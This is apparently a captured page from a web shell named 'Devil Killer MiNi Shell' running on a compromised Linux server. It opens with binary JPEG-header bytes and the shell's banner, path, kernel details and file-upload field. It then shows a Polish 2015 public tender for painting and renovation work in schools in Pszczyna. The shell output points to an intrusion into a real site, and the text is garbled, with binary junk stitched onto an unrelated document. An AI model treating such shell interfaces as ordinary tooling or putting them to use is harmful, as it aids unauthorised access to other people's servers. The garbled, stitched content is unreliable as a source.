JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150522/74285-N-2015.html

<p class="kh_header"><b>Pszczyna: Zadanie 1
Cyklinowanie i malowanie parkietu oraz malowanie ścian i sufitu
w salce gimnastyki korekcyjnej
w segmencie B w Zespole Szkół nr 2 w Pszczynie przy ul. Staromiejskiej 43.

Zadanie 2
Roboty malarskie w Szkole Podstawowej nr 8 w Rudołtowicach przy ul.A.Krzywoń 5.

Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 12 w  Studzionce przy ul.Jordana 3A

Zadanie 4
Roboty malarskie w Publicznym Przedszkolu nr 4 w Pszczynie przy ul.Narcyzów 30.

Zadanie 5
Remont pomieszczeń  w Publicznym Gimnazjum nr 4 w Pszczynie przy ul. Konopnickiej 44.</b><br>
<b>Numer ogłoszenia: 74285 - 2015; data zamieszczenia: 22.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
Cyklinowanie i malowanie parkietu oraz malowanie ścian i sufitu
w salce gimnastyki korekcyjnej
w segmencie B w Zespole Szkół nr 2 w Pszczynie przy ul. Staromiejskiej 43.

Zadanie 2
Roboty malarskie w Szkole Podstawowej nr 8 w Rudołtowicach przy ul.A.Krzywoń 5.

Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 12 w  Studzionce przy ul.Jordana 3A

Zadanie 4
Roboty malarskie w Publicznym Przedszkolu nr 4 w Pszczynie przy ul.Narcyzów 30.

Zadanie 5
Remont pomieszczeń  w Publicznym Gimnazjum nr 4 w Pszczynie przy ul. Konopnickiej 44..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1  -  Zadanie obejmuje  cyklinowanie i malowanie parkietu  oraz  malowanie ścian i sufitów w salce 
gimnastyki korekcyjnej w segmencie B w Zespole Szkół nr 2  w zakresie :
-  malowania ścian i sufitów farba emulsyjną akrylową z przygotowaniem podłoża i gruntowaniem,
-  malowania rur,
-  cyklinowania i lakierowanie parkietu lakierem  dwuskładnikowym  poliuretanowym dla posadzek sportowych 
   antypoślizgowym
-  wymiany  cokołów przyściennych drewnianych dębowych  o wym. 2 x 8 cm , lakierowanych , górna krawędź 
    wyoblona 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .

Zadanie 2
Zadanie obejmuje   malowanie wybranych pomieszczeń  tj:   korytarza I piętra , klatki schodowej i jadalni oraz likwidacje otworu drzwiowego w Szkole Podstawowej nr 8 w Rudołtowicach   w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur, grzejników , balustrad  i drobnych elementów metalowych 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .



Zadanie 3
Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:  sali nr 32 a, sali nr 19 z zapleczem  i pomieszczeń magazynowych nr 12 i 13  w Szkole Podstawowej nr 12 w Studzionce  w zakresie :
- likwidacji pęknięć ,
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur , grzejników  i drobnych elementów metalowych 
- lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .

Zadanie 4 
Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:   korytarza , wc personelu, łazienki dla dzieci , kuchni , zmywalni oraz klatki schodowej w Publicznym Przedszkolu Nr 4 w Pszczynie  w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki ,
- malowania rur , grzejników   i drobnych elementów metalowych ,
- lakierowania stolarki drzwiowej ,
- malowania  schodów ,
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .

Zadanie 5 
Zadanie obejmuje :  
1. Malowanie wybranych pomieszczeń  tj: pracowni technicznej , sali nr 4 i  sali nr 8 w Publicznym Gimnazjum nr 4  w zakresie ;
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejna   - kolor do uzgodnienia z dyrekcją placówki 
- malowanie stolarki drzwiowej 
- malowania rur i drobnych elementów metalowych 
- malowania parapetów betonowych 
- malowania rur i drobnych elementów metalowych 
2. Malowanie stołów i szafek w pracowni technicznej w zakresie :
- dwukrotnego malowania z jednokrotnym szpachlowaniem metalowych biurek roboczych 
- dwukrotnego malowania z jednokrotnym szpachlowaniem blatów roboczych 
3.Wymianę wykładziny wraz z remontem podłoża w  pracowni technicznej w  zakresie :
 - demontażu  posadzki z płytek PCW
- wykonania warstwy wyrównawczej z zaprawy samopoziomującej grub. ok. 1,5 cm 
- ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na wysokość ok. 15 cm - kolor do uzgodnienia 
  z dyrekcja placówki
- montaż listwy aluminiowej -progowej
- wywóz i utylizacje gruzu i materiałów z rozbiórki zgodnie z obowiązującymi przepisami prawa
Wymagania dla  wykładziny :
-  wykładzina obiektowa heterogeniczna z przezroczystą warstwą użytkowa  np.; firmy Gamrat - Rekord 42 lub 
    równoważna , ułożona na kleju na całej powierzchni 
-  grubość całkowita wykładziny min. 2 mm  
-  grubość warstwy użytkowej min. 0,8 mm  
-  zabezpieczona fabrycznie warstwą poliuretany PUR 
-  klasyfikacja użytkowania 43  
-  odporność na ścieranie - Grupa T  
-  zgrzewana
-  kolor do uzgodnienia z dyrekcją placówki 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .

Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi , dokumentacją techniczną i wziąć je pod uwagę przy sporządzaniu oferty..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z art. 67 ust. pkt 6 Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości :   
      Zadanie 1   -        200,00  zł.  ( słownie : dwieście złotych )
      Zadanie 2   -        200,00  zł.  ( słownie : dwieście  złotych )
      Zadanie 3   -        200,00  zł.  ( słownie : dwieście  złotych)
      Zadanie 4  -          200,00 zł.  ( słownie : dwieście  złotych
       Zadanie 5 -          500,00 zł.  ( słownie :  pięćset złotych)
      należy wnieść w terminie    08.06.2015 r.  do godz. 1100 przed upływem terminu składania ofert.
       Wadium w  formie innej niż pieniądz,  dopuszczonej art.45 ust 6 Prawa zamówień publicznych (Dz.U.nr223 
       poz.1655 z 2007 r.). należy złożyć w formie oryginału  w kasie PZE, czynnej :  
                                                                                     w godz.    700  - 1430  ( środa, piątek)
	         		                                          w godz.  1200  - 1430 (wtorek)
     Gwarancja zapłaty wadium winna  być  bezwarunkowa i płatna na pierwsze żądanie.
     Wadium wniesione w pieniądzu należy wpłacić przelewem  na  konto : 
     ING Bank Śląski o/Pszczyna -  Pszczyński  Zarząd Edukacji - nr 80 1050 1070 1000 0090 3028 5937
     Potwierdzeniem dokonania wpłaty wadium jest uznanie kwotą wadium rachunku Zamawiającego ( wpływśrodków  na rachunek   Zamawiającego przed upływem terminu składania ofert).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1,Oświadczenie wykonawcy , że  nie zalega z opłacaniem podatków, opłat oraz  składek na ubezpieczenie zdrowotne 
       i społeczne,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja na roboty i materiały : 1 pkt -za 3 lata, 5 pkt. za 4 lata, 10 pkt. za 5 lat - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może być dokonana tylko w sytuacji, gdy konieczność wprowadzenia takich zmian 
    wyniknie w rezultacie zdarzeń, których w chwili zawarcia umowy nie można było przewidzieć, którym nie można 
    było zapobiec, ani którym nie można przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub 
    w całości jego zadania.   Zamawiający   przewiduje zmiany umowy w przypadkach :
1.	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
2.	wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
3.	niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy (w szczególności choroby, wypadku losowego, nieprzewidzianej  zmiany   organizacyjnej).
4.    zmiana podwykonawcy robót w trakcie realizacji umowy za zgodą Zamawiającego
 Zmiana postanowień umowy z uwagi na wystąpienie powyższych lub innych okoliczności niezależnych od    
Wykonawcy, może    nastąpić pod warunkiem wyrażenia zgody przez Zamawiającego.  .
Wszelkie zmiany uzupełnienia  umowy wymagają zachowania formy pisemnej w postaci aneksu do umowy 
podpisanego przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
            43-200 Pszczyna
            ul. Zdrojowa 4
            tel.(32) 210-21-93 ,  fax wew.118 lub 115
pokój nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
            43-200 Pszczyna
            ul. Zdrojowa 4
            tel.(32) 210-21-93 ,  fax wew.118 lub 115
pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
Cyklinowanie i malowanie parkietu oraz malowanie ścian i sufitu
w salce gimnastyki korekcyjnej
w segmencie B w Zespole Szkół nr 2 w Pszczynie przy ul. Staromiejskiej 43..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1  -  Zadanie obejmuje  cyklinowanie i malowanie parkietu  oraz  malowanie ścian i sufitów w salce 
gimnastyki korekcyjnej w segmencie B w Zespole Szkół nr 2  w zakresie :
-  malowania ścian i sufitów farba emulsyjną akrylową z przygotowaniem podłoża i gruntowaniem,
-  malowania rur,
-  cyklinowania i lakierowanie parkietu lakierem  dwuskładnikowym  poliuretanowym dla posadzek sportowych 
   antypoślizgowym
-  wymiany  cokołów przyściennych drewnianych dębowych  o wym. 2 x 8 cm , lakierowanych , górna krawędź 
    wyoblona 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały : 1 pkt. za 3 lata, 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Roboty malarskie w Szkole Podstawowej nr 8 w Rudołtowicach przy ul.A.Krzywoń 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje   malowanie wybranych pomieszczeń  tj:   korytarza I piętra , klatki schodowej i jadalni oraz likwidacje otworu drzwiowego w Szkole Podstawowej nr 8 w Rudołtowicach   w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur, grzejników , balustrad  i drobnych elementów metalowych 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały : 1 pkt. za 3 lata, 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 12 w  Studzionce przy ul.Jordana 3A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:  sali nr 32 a, sali nr 19 z zapleczem  i pomieszczeń magazynowych nr 12 i 13  w Szkole Podstawowej nr 12  w zakresie :
- likwidacji pęknięć ,
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur , grzejników  i drobnych elementów metalowych 
- lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4
Roboty malarskie w Publicznym Przedszkolu nr 4 w Pszczynie przy ul.Narcyzów 30..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:   korytarza , wc personelu, łazienki dla dzieci , kuchni , zmywalni oraz klatki schodowej w Publicznym Przedszkolu Nr 4 w Pszczynie  w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki ,
- malowania rur , grzejników   i drobnych elementów metalowych ,
- lakierowania stolarki drzwiowej ,
- malowania  schodów ,
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5
Remont pomieszczeń  w Publicznym Gimnazjum nr 4 w Pszczynie przy ul. Konopnickiej 44..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje :  
1. Malowanie wybranych pomieszczeń  tj: pracowni technicznej , sali nr 4 i  sali nr 8 w Publicznym Gimnazjum nr 4  w zakresie ;
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejna   - kolor do uzgodnienia z dyrekcją placówki 
- malowanie stolarki drzwiowej 
- malowania rur i drobnych elementów metalowych 
- malowania parapetów betonowych 
- malowania rur i drobnych elementów metalowych 
2. Malowanie stołów i szafek w pracowni technicznej w zakresie :
- dwukrotnego malowania z jednokrotnym szpachlowaniem metalowych biurek roboczych 
- dwukrotnego malowania z jednokrotnym szpachlowaniem blatów roboczych 
3.Wymianę wykładziny wraz z remontem podłoża w  pracowni technicznej w  zakresie :
 - demontażu  posadzki z płytek PCW
- wykonania warstwy wyrównawczej z zaprawy samopoziomującej grub. ok. 1,5 cm 
- ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na wysokość ok. 15 cm - kolor do uzgodnienia 
  z dyrekcja placówki
- montaż listwy aluminiowej -progowej
